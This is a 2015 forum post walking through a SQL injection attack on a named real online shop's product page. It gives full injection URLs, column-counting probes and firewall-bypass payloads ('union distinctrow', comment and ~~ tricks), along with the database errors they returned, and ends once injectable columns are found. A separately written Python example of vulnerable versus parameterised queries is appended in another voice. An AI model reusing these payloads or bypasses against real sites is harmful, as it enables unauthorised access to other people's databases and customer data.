Kyfx

SQL challenge

Feb 27th, 2015
The challenge is very nice. Many members will definitely learn new things from it. So now I am posting the text solution of my challenge. Remember, this is my last post.
Target :-
http://www.lampbulbs.co.uk/product.php?prodid=162
Task :- Print version
Solution :-
Step 1. First I use ' to check whether the site is vulnerable or not.
http://www.lampbulbs.co.uk/product.php?prodid=162
By putting ' like
http://www.lampbulbs.co.uk/product.php?prodid=162'
Result:-
Error in query: SELECT * FROM products WHERE prodid LIKE '162''. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''162''' at line 1
Means the site is vulnerable to SQLi.
Step 2 :-
Let's balance the query
http://www.lampbulbs.co.uk/product.php?prodid=162--
Result :- Forbidden Error
Hmm, interesting.
Try %60 now
http://www.lampbulbs.co.uk/product.php?prodid=162%60
Result :- No error
Step 3 :- Finding the number of columns using the ORDER BY command
http://www.lampbulbs.co.uk/product.php…
Result :-
Again Forbidden Error. Let's bypass this
Try :-
http://www.lampbulbs.co.uk/product.php… --->Forbidden
http://www.lampbulbs.co.uk/product.php… ---> 403 Forbidden
http://www.lampbulbs.co.uk/product.phpprodid=162+OrDe…/…/%60
---> Site Normal
Let's increase the number
http://www.lampbulbs.co.uk/product.php…
----> Same Result. Let's try String Based SQLi
http://www.lampbulbs.co.uk/product.php…
Result :--
Error in query: SELECT * FROM products WHERE prodid LIKE '16' OrDeR bY /**100**/`'. Unknown column ''' in 'order clause'
Hmm, interesting
http://www.lampbulbs.co.uk/product.php…
Result same as above
Now here is a new step for some members to learn
I experimented and did this
http://www.lampbulbs.co.uk/product.php…-- -
Notice /**1**/1 <--- A new thing which I learned from the forum some months ago.
Now increase the number
like
/**1**/2 <--- Note the 2 there
http://www.lampbulbs.co.uk/product.php?prodid=162' order by/**1**/2--+-
You see this --->
Energy Saving Light Bulbs Household >
Crompton Energy Saving GU10 11 Watt Warm White or Cool White
Manufacturer: Crompton Lamps
Energy Saving GU10 alternative to halogen.
High Quality Lamp
11watts = to 55 watt GLS
600 Lumens
Great Value For Money
Reduces Your Lighting Costs
8000 Hours Life
Crompton Energy Saving GU10 11 Watt Warm White or Cool White
Error in query: SELECT param_name FROM parameters WHERE prodid LIKE '162' order by/**1**/2-- -' ORDER BY paramid. Unknown column '2' in 'order clause'
So does that mean there is 1 column? Hmm, let's check
Let's use the UNION SELECT command once --->
http://www.lampbulbs.co.uk/product.php?prodid=162' union select 1--+-
So it's giving Forbidden Error. Means WAF. Let's bypass this WAF.
http://www.lampbulbs.co.uk/product.php?prodid=162' /*!union*/ select 1--+-
The same WAF appears. So after trying some WAF bypass methods I got to know to use distinctrow. This will bypass the WAF. Let's now use this
http://www.lampbulbs.co.uk/product.php?prodid=162' union distinctrow select 1--+-
Result :-
Error in query: SELECT * FROM products WHERE prodid LIKE '162' union distinctrow select 1-- -'. The used SELECT statements have a different number of columns
It means we are using the wrong number of columns. Columns must be more than 1. If we see the above error we can do Error Based SQLi. But here in this challenge I used Union Based SQLi. So let's try more.
As you see the error on 2, I guess that one is not the actual error. There must be another real error. So let's try
http://www.lampbulbs.co.uk/product.php?prodid=16' order by /**1**/10-- -
Same error. Let's increase the number.
http://www.lampbulbs.co.uk/product.php?prodid=16' order by /**1**/100-- -
This time the error is different ---->
Error in query: SELECT * FROM products WHERE prodid LIKE '16' order by /**1**/100-- -'. Unknown column '100' in 'order clause'
So this is the actual error. I got 42 columns using this.
Column 43 --->
http://www.lampbulbs.co.uk/product.php?prodid=16' order by /**1**/43-- -
Error :-
Error in query: SELECT * FROM products WHERE prodid LIKE '16' order by /**1**/43-- -'. Unknown column '43' in 'order clause'
Column 42 --->
http://www.lampbulbs.co.uk/product.php?prodid=16' order by /**1**/42-- -
False error with the site normal. Hmm, it means the number of columns is 42.
Step 3:- Let's find the number of vulnerable columns out of the 42 columns
The command used for this is union select. But as I mentioned above about distinctrow, now I use this.
http://www.lampbulbs.co.uk/product.php?prodid=16'union distinctrow select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42-- -
Result :-- 403 Forbidden, means WAF.
I always used different types to bypass WAF, but yesterday I thought to do some experiment so I did it differently.
By examining the WAF behaviour I noticed that the WAF was looking for union select number,number so I did this
http://www.lampbulbs.co.uk/product.php?prodid=162'union distinctrow select 1,~~2,~~3,~~4,~~5,~~6,~~7,~~8,~~9,~~10,~~11,~~12,~~13,~~14,~~15,~~16,~~17,~~18,~~19,~~20,~~21,~~22,~~23,~~24,~~25,~~26,~~27,~~28,~~29,~~30,~~31,~~32,~~33,~~34,~~35,~~36,~~37,~~38,~~39,~~40,~~41,~~42-- -
I got some vulnerable columns. Now you can inject the site as normal.
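The root cause the whole walkthrough rests on is visible in the echoed error: the prodid value is concatenated straight into `SELECT * FROM products WHERE prodid LIKE '...'` and the failing query is sent back to the browser. The following is an added example, not the site's code or the poster's, showing that pattern beside a parameterised version; the products rows are constructed and an in-memory SQLite database stands in for MySQL.

```python
"""Vulnerable vs. parameterised lookup for a product.php-style query.

Added example, not from the original paste. An in-memory SQLite database
stands in for the site's MySQL; the products table and rows are constructed.
"""
import sqlite3
from urllib.parse import unquote_plus

# Constructed sample rows: the paste only reveals the table and column names.
SAMPLE_ROWS = [(162, "Crompton Energy Saving GU10 11 Watt"), (16, "Lamp 16")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (prodid INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, raw_prodid):
    """Concatenates the decoded query-string value into the SQL text, as the
    error message quoted on the page shows the site doing.
    Returns ("ok", rows) or ("error", message); the site sent that message,
    including the full query, back to the browser."""
    prodid = unquote_plus(raw_prodid)
    sql = f"SELECT * FROM products WHERE prodid LIKE '{prodid}'"
    try:
        return "ok", conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "error", f"Error in query: {sql}. {exc}"


def lookup_safe(conn, raw_prodid):
    """Validates the value as an integer id, then binds it as a parameter.
    Quotes, comments and keywords in the input are never parsed as SQL, and a
    malformed id gives an empty result rather than a database error."""
    prodid = unquote_plus(raw_prodid)
    if not prodid.isdigit():
        return "ok", []
    rows = conn.execute("SELECT * FROM products WHERE prodid = ?",
                        (int(prodid),)).fetchall()
    return "ok", rows


if __name__ == "__main__":
    db = make_db()
    # Probes taken from the walkthrough: plain id, the ' test, %60, ORDER BY.
    for probe in ("162", "162'", "162%60", "162'+order+by/**1**/2--+-"):
        print(probe, lookup_vulnerable(db, probe), lookup_safe(db, probe))
```

With the page's own probes, the concatenated version raises a syntax error for `162'` and executes the injected `order by/**1**/2`, while the parameterised version returns an empty result for both and never reveals the query text.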